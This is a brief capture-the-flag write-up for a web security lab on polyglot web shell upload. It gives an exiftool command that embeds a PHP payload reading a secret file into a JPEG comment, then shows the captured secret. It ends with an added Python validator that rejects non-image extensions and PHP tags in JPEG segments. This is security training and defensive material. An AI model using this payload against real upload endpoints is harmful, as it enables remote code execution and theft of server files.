Remote code execution via polyglot web shell upload
Solution
Login to website
L: wiener
P: peter
Prepare payload
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Remote code execution via polyglot web shell upload]
└─$ exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" file.jpg -o hack.php
1 image files created
Upload PHP shell
Read secret
https://0a84004f0411b04380d9f8cb00f80095.web-security-academy.net/files/avatars/hack.php
Submit solution
Secret: oArFqKYZEqHFGq7PvQvPUQoiJzJukR09
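
Defender's view of the steps above, as an added example that is not part of the original writeup or the lab's code: an upload check that refuses non-image extensions and walks the JPEG header segments looking for PHP open tags such as the one exiftool placed in the comment. The names `check_upload`, `jpeg_segments`, `build_jpeg` and the `ALLOWED_EXT` allowlist are assumptions, and the sample JPEG bytes are constructed inline.

```python
import struct

PHP_MARKERS = (b"<?php", b"<?=")   # open tags to look for
ALLOWED_EXT = {".jpg", ".jpeg"}    # assumed allowlist


def jpeg_segments(data):
    """Yield (marker, payload) for each header segment before the scan data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("corrupt segment header")
        marker = data[pos + 1]
        if marker == 0xDA:  # SOS: compressed image data follows
            return
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError("bad segment length")
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def check_upload(filename, data):
    """Return the reasons to reject an upload (empty list = accept)."""
    reasons = []
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        reasons.append(f"extension {ext or '(none)'} not allowed")
    try:
        for marker, payload in jpeg_segments(data):
            if any(tag in payload for tag in PHP_MARKERS):
                reasons.append(f"PHP tag in segment 0xFF{marker:02X}")
    except ValueError as exc:
        reasons.append(str(exc))
    return reasons


def build_jpeg(comment):
    """Constructed sample: SOI, JFIF APP0, COM segment, EOI."""
    def seg(marker, body):
        return b"\xff" + bytes([marker]) + struct.pack(">H", len(body) + 2) + body
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return b"\xff\xd8" + seg(0xE0, app0) + seg(0xFE, comment) + b"\xff\xd9"


if __name__ == "__main__":
    print(check_upload("hack.php", build_jpeg(b"<?php echo 'START'; ?>")))
    print(check_upload("avatar.jpg", build_jpeg(b"holiday photo")))
```

The extension check is the control that stops execution; the segment scan is a secondary signal, since a file stored as `.jpg` in a directory that does not run PHP is inert even if the comment survives.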